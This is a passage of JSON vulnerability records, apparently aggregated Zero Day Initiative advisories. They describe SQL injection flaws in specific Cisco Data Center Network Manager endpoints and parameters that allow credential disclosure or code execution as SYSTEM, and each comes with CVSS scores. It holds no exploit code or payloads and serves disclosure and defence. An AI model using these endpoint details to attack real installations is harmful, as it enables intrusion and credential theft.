"ZDI-20-053", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-053/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T22:10:57", "description": "This vulnerability allows remote attackers to 
disclose sensitive information on affected installations of Cisco Data Center Network Manager. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the processing of requests to the virtualportchannel endpoint. When parsing the filterStr parameter in the getVpcCount method, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker could leverage this vulnerability to disclose stored credentials, leading to further compromise.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-03T00:00:00", "type": "zdi", "title": "Cisco Data Center Network Manager getVpcCount SQL Injection Information Disclosure Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "ZDI-20-108", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-108/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T22:11:03", "description": "This vulnerability allows 
remote attackers to execute arbitrary code on affected installations of Cisco Data Center Network Manager. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the processing of requests to the rest/topology/switches/otv/feature service. When parsing the switch-id parameter, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-03T00:00:00", "type": "zdi", "title": "Cisco Data Center Network Manager getDiscoveredDeviceCount switchIdList SQL Injection Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "ZDI-20-097", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-097/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T22:11:34", "description": "This vulnerability allows 
remote attackers to execute arbitrary code on affected installations of Cisco Data Center Network Manager. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the processing of requests to the fm/fmrest/sanIslStat endpoint. When parsing the searchId parameter, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-03T00:00:00", "type": "zdi", "title": "Cisco Data Center Network Manager getSanIslStatListESBySQL SQL Injection Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "ZDI-20-045", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-045/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T22:11:07", "description": "This vulnerability allows remote attackers to execute 
arbitrary code on affected installations of Cisco Data Center Network Manager. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the processing of requests to the StatisticsWSService/StatisticsWS service. When parsing the sortType parameter of the getEndDeviceStatDataLength endpoint, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-03T00:00:00", "type": "zdi", "title": "Cisco Data Center Network Manager getEndDeviceStatListWithVsan SQL Injection Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "ZDI-20-091", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-091/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T22:11:47", "description": "This vulnerability 
allows remote attackers to execute arbitrary code on affected installations of Cisco Data Center Network Manager. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the processing of requests to the fm/fmrest/virtualportchannel/vpcwizard/history endpoint. When parsing the sort parameter, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-03T00:00:00", "type": "zdi", "title": "Cisco Data Center Network Manager getVpcHistory SQL Injection Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "ZDI-20-022", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-022/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T22:11:17", "description": "This vulnerability allows remote 
attackers to execute arbitrary code on affected installations of Cisco Data Center Network Manager. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the processing of requests to the StatisticsWSService/StatisticsWS service. When parsing the sortType parameter of the getGigEStatList endpoint, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-03T00:00:00", "type": "zdi", "title": "Cisco Data Center Network Manager getLanGigEStatList SQL Injection Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "ZDI-20-074", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-074/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T22:11:47", "description": "This vulnerability 
allows remote attackers to disclose sensitive information on affected installations of Cisco Data Center Network Manager. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the processing of requests to the fm/fmrest/virtualportchannel/domain endpoint. When parsing the filterStr parameter, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this in conjunction with other vulnerabilities to execute code in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-03T00:00:00", "type": "zdi", "title": "Cisco Data Center Network Manager VirtualPortChannel getDomain SQL Injection Information Disclosure Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "ZDI-20-025", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-025/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T22:11:51", 
"description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of Cisco Data Center Network Manager. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the processing of requests to the fm/fmrest/smartLicensing/persistUserInfo endpoint. When parsing the username parameter, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-03T00:00:00", "type": "zdi", "title": "Cisco Data Center Network Manager persistUserInfo SQL Injection Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "ZDI-20-016", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-016/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T22:11:16", "description": 
"This vulnerability allows remote attackers to execute arbitrary code on affected installations of Cisco Data Center Network Manager. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the processing of requests to the StatisticsWSService/StatisticsWS service. When parsing the sortType parameter of the getGigEStatList endpoint, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-03T00:00:00", "type": "zdi", "title": "Cisco Data Center Network Manager getSanGigEStatList SQL Injection Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "ZDI-20-073", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-073/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T22:11:28", 
"description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of Cisco Data Center Network Manager. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the processing of requests to the DbInventoryWSService/DbInventoryWS service. When parsing the sortType parameter of the getAllAppGroups endpoint, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-03T00:00:00", "type": "zdi", "title": "Cisco Data Center Network Manager getAllGroups SQL Injection Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "ZDI-20-056", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-056/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": 
"2022-01-31T22:11:33", "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of Cisco Data Center Network Manager. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the processing of requests to the fm/fmrest/inventory/npvlinks service. When parsing the sort parameter, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-03T00:00:00", "type": "zdi", "title": "Cisco Data Center Network Manager getNpvLinks SQL Injection Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "ZDI-20-047", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-047/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T22:10:49", "description": 
"This vulnerability allows remote attackers to disclose sensitive information on affected installations of Cisco Data Center Network Manager. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the processing of requests to the getSwitchsDataLength endpoint of the DbInventoryWS service. When parsing the colFilterStr parameter in the getLanSwitchDataLength method, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker could leverage this vulnerability to disclose stored credentials, leading to further compromise.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-03T00:00:00", "type": "zdi", "title": "Cisco Data Center Network Manager getLanSwitchDataLength SQL Injection Information Disclosure Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "ZDI-20-121", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-121/", "cvss": {"score": 9.0, "vector": 
"AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T22:11:40", "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of Cisco Data Center Network Manager. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the processing of requests to the fm/fmrest/inventory/getHostEnclList endpoint. When parsing the sort parameter, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-03T00:00:00", "type": "zdi", "title": "Cisco Data Center Network Manager getHostEnclList SQL Injection Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "ZDI-20-033", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-033/", "cvss": {"score": 9.0, "vector": 
"AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T22:11:14", "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of Cisco Data Center Network Manager. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the processing of requests to the StatisticsWSService/StatisticsWS service. When parsing the sortType parameter of the getIslStatDataLength endpoint, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-03T00:00:00", "type": "zdi", "title": "Cisco Data Center Network Manager getSanIslStatList SQL Injection Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "ZDI-20-079", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-079/", "cvss": {"score": 
9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T22:11:49", "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of Cisco Data Center Network Manager. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the processing of requests to the rest/imagemanagement/gir/tasks endpoint. When parsing the filterStr parameter, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-03T00:00:00", "type": "zdi", "title": "Cisco Data Center Network Manager ImageManagement SQL Injection Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "ZDI-20-018", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-018/", "cvss": {"score": 9.0, "vector": 
"AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T22:11:48", "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of Cisco Data Center Network Manager. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the processing of requests to the fm/fmrest/virtualportchannel endpoint. When parsing the filterStr parameter or the sort parameter, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-03T00:00:00", "type": "zdi", "title": "Cisco Data Center Network Manager getAllVpc SQL Injection Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "ZDI-20-021", "href": 